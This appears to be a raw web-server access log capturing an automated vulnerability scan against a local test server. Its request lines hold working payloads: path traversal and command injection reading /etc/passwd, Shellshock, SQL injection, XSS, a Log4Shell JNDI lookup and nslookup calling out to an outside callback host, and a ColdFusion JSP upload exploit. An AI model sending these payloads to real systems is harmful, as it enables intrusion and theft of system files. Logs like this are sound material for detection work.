HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.105","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.109","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.110","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.117","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.109","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.115","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.108","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.103","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MbGEw4pIPbd52khSjUVFw4Y3/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MdqOtjLkPgdmZZg36fX9Suro.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A297MdqOtjLkPgdmZZg36fX9Suro.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.120","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9v8hn0smpv8c57g0t00toruhxzqajxsa.oast.live}"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20c9v8hn0smpv8c57g0t00r6x1gci6k3xk5.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/297MdqOtjLkPgdmZZg36fX9Suro.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.149","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.140","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.147","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.147","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.015","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.086","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.120","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.100","http_user_agent":"Mozilla/5.0 